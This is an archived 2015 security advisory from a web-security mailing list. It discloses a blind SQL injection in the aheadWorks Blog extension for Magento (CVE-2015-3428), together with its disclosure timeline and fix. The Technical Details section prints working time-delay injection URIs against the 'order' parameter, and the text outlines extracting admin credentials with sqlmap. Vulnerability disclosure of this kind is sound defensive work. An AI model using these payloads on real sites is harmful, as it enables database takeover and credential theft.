WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

SQL Injection within popular Magento blog extension (CVE-2015-3428)

From: AppCheck Advisories <advisories () appcheck-ng com>
Date: Thu, 28 May 2015 14:52:19 +0000
Background
======================

The aheadWorks Blog extension for Magento prior to version 1.3.10 is vulnerable to a critical SQL Injection security 
flaw. A remote unauthenticated attacker could exploit this vulnerability to take complete control of the affected 
Magento server and database. With almost 80,000 downloads at the time of writing, the affected component is the most 
popular blog component available via Magento Connect.

Advisory Link:  http://appcheck-ng.com/critical-security-flaw-patched-in-magento-blog-extension-cve-2015-3428/
Vendor Link:    http://www.magentocommerce.com/magento-connect/blog-community-edition-by-aheadworks.html


Technical Details
======================

The SQL Injection flaw was discovered using the AppCheck NG scanner during preparation for a security seminar. The 
exercise involved configuring several popular CMS platforms including WordPress, Joomla, Drupal and Magento along with 
the most popular plugins available at the time for each platform.

A default AppCheck NG scan was then performed against each system to demonstrate our ability to discover previously 
undisclosed security flaws using AppCheck NG. Among the discovered vulnerabilities was a Blind SQL Injection flaw 
within the aheadWorks Blog extension component. AppCheck was able to identify the flaw by triggering a measurable time 
delay using the MySQL "SLEEP()" function. 

For example, the following URI will trigger a 10 second time delay when accessed using a web browser:

        http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(10))A)) OR 1234=4321

Compared the following URI that will trigger a 2 second delay:

        http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(2))A)) OR 1234=4321

AppCheck NG employs a range of methods to detect blind SQL injection including time delay inference. Each suspected 
flaw is confirmed through 15 validation cycles to eradicate false positives.

Exploit
======================

The attacker could easily exploit this flaw using publicly available exploit tools such as sqlmap (http://sqlmap.org/). 
By extracting the username and hashed password from the admin_user table, it is possible to obtain Magento 
administrator credentials via an offline attack. A demonstration of this flaw is performed at our free application 
security seminar. See the following URL for our next event: http://appcheck-ng.com/events/

Solution
======================

This flaw was reported to aheadWorks on the 22nd of April 2015, a fix was made available on the 27th of May 2015 and 
can be downloaded via Magento Connect.
 
 
 

***



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: